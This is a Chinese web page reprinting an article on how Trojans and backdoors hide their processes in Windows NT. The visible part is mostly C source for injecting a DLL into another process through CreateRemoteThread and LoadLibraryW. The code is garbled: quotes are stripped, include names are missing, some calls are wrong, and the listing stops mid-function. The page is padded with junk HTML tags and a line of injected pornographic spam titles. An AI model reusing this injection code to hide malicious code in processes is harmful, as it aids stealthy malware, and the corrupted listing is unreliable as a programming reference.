<dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><s id="yhprb"><strike id="yhprb"></strike></s></dfn><small id="yhprb"></small><dfn id="yhprb"></dfn><small id="yhprb"><delect id="yhprb"></delect></small><small id="yhprb"></small><small id="yhprb"></small> <delect id="yhprb"><strike id="yhprb"></strike></delect><dfn id="yhprb"></dfn><dfn id="yhprb"></dfn><s id="yhprb"><noframes id="yhprb"><small id="yhprb"><dfn id="yhprb"></dfn></small><dfn id="yhprb"><delect id="yhprb"></delect></dfn><small id="yhprb"></small><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn> <small id="yhprb"></small><delect id="yhprb"><strike id="yhprb"></strike></delect><dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"><s id="yhprb"><strike id="yhprb"></strike></s></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn>

新聞中心

EEPW首頁(yè) > 嵌入式系統 > 設計應用 > 木馬/后門(mén)程序在WINNT中進(jìn)程隱藏及查找的方法

木馬/后門(mén)程序在WINNT中進(jìn)程隱藏及查找的方法

作者: 時(shí)間:2012-07-02 來(lái)源:網(wǎng)絡(luò ) 收藏

#include

本文引用地址:http://dyxdggzs.com/article/148821.htm

  #include

  #include

  DWORD ProcessToPID( char *); //將名轉換為PID的函數

  void CheckError ( int, int, char *); //出錯處理函數

  void usage ( char *); //使用說(shuō)明函數

  PDWORD pdwThreadId;

  HANDLE hRemoteThread, hRemoteProcess;

  DWORD fdwCreate, dwStackSize, dwRemoteProcessId;

  PWSTR pszLibFileRemote=NULL;

  void main(int argc,char **argv)

  {

  int iReturnCode;

  char lpDllFullPathName[MAX_PATH];

  WCHAR pszLibFileName[MAX_PATH]={0};

  //處理命令行參數

  if (argc!=3) usage(Parametes number incorrect!);

  else{

  //如果輸入的是名,則轉化為PID

  if(isdigit(*argv[1])) dwRemoteProcessId = atoi(argv[1]);

  else dwRemoteProcessId = ProcessToPID(argv[1]);

  //判斷輸入的DLL文件名是否是絕對路徑

  if(strstr(argv[2],:)!=NULL)

  strncpy(argv[2], lpDllFullPathName, MAX_PATH);

  else

  { //取得當前目錄,將相對路徑轉換成絕對路徑

  iReturnCode = GetCurrentDirectory(MAX_PATH, lpDllFullPathName);

  CheckError(iReturnCode, 0, GetCurrentDirectory);

  strcat(lpDllFullPathName, );

  strcat(lpDllFullPathName, argv[2]);

  printf(Convert DLL filename to FullPathName:nt%snn,

  lpDllFullPathName);

  }

  //判斷DLL文件是否存在

  iReturnCode=(int)_lopen(lpDllFullPathName, OF_READ);

  CheckError(iReturnCode, HFILE_ERROR, DLL File not Exist);

  //將DLL文件全路徑的ANSI碼轉換成UNICODE碼

  iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,

  lpDllFullPathName, strlen(lpDllFullPathName),

  pszLibFileName, MAX_PATH);

  CheckError(iReturnCode, 0, MultByteToWideChar);

  //輸出最后的操作參數

  wprintf(LWill inject %s, pszLibFileName);

  printf( into process:%s PID=%dn, argv[1], dwRemoteProcessId);

  }

  //打開(kāi)遠程

  hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許創(chuàng )建線(xiàn)程

  PROCESS_VM_OPERATION | //允許VM操作

  PROCESS_VM_WRITE, //允許VM寫(xiě)

  FALSE, dwRemoteProcessId );

  CheckError( (int) hRemoteProcess, NULL,

  Remote Process not Exist or Access Denied!);

  //計算DLL路徑名需要的內存空間

  int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);

  pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,

  MEM_COMMIT, PAGE_READWRITE);

  CheckError((int)pszLibFileRemote, NULL, VirtualAllocEx);

  //將DLL的路徑名復制到遠程進(jìn)程的內存空間

  iReturnCode = WriteProcessMemory(hRemoteProcess,

  pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);

  CheckError(iReturnCode, false, WriteProcessMemory);

  //計算LoadLibraryW的入口地址

  PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)

  GetProcAddress(GetModuleHandle(TEXT(Kernel32)), LoadLibraryW);

  CheckError((int)pfnStartAddr, NULL, GetProcAddress);

  //啟動(dòng)遠程線(xiàn)程,通過(guò)遠程線(xiàn)程調用用戶(hù)的DLL文件

  hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);

  CheckError((int)hRemoteThread, NULL, Create Remote Thread);

  //等待遠程線(xiàn)程退出

  WaitForSingleObject(hRemoteThread, INFINITE);

  //清場(chǎng)處理

  if (pszLibFileRemote != NULL)

  VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);

  if (hRemoteThread != NULL) CloseHandle(hRemoteThread );

  if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);

  }//end of main()

  //將進(jìn)程名轉換為PID的函數

  DWORD ProcessToPID(char *InputProcessName)

  {

  DWORD aProcesses[1024], cbNeeded, cProcesses;

  unsigned int i;

  HANDLE hProcess;

  HMODULE hMod;

  char szProcessName[MAX_PATH] = UnknownProcess;



評論


相關(guān)推薦

技術(shù)專(zhuān)區

關(guān)閉
国产精品自在自线亚洲|国产精品无圣光一区二区|国产日产欧洲无码视频|久久久一本精品99久久K精品66|欧美人与动牲交片免费播放
<dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><s id="yhprb"><strike id="yhprb"></strike></s></dfn><small id="yhprb"></small><dfn id="yhprb"></dfn><small id="yhprb"><delect id="yhprb"></delect></small><small id="yhprb"></small><small id="yhprb"></small> <delect id="yhprb"><strike id="yhprb"></strike></delect><dfn id="yhprb"></dfn><dfn id="yhprb"></dfn><s id="yhprb"><noframes id="yhprb"><small id="yhprb"><dfn id="yhprb"></dfn></small><dfn id="yhprb"><delect id="yhprb"></delect></dfn><small id="yhprb"></small><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn> <small id="yhprb"></small><delect id="yhprb"><strike id="yhprb"></strike></delect><dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"><s id="yhprb"><strike id="yhprb"></strike></s></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn>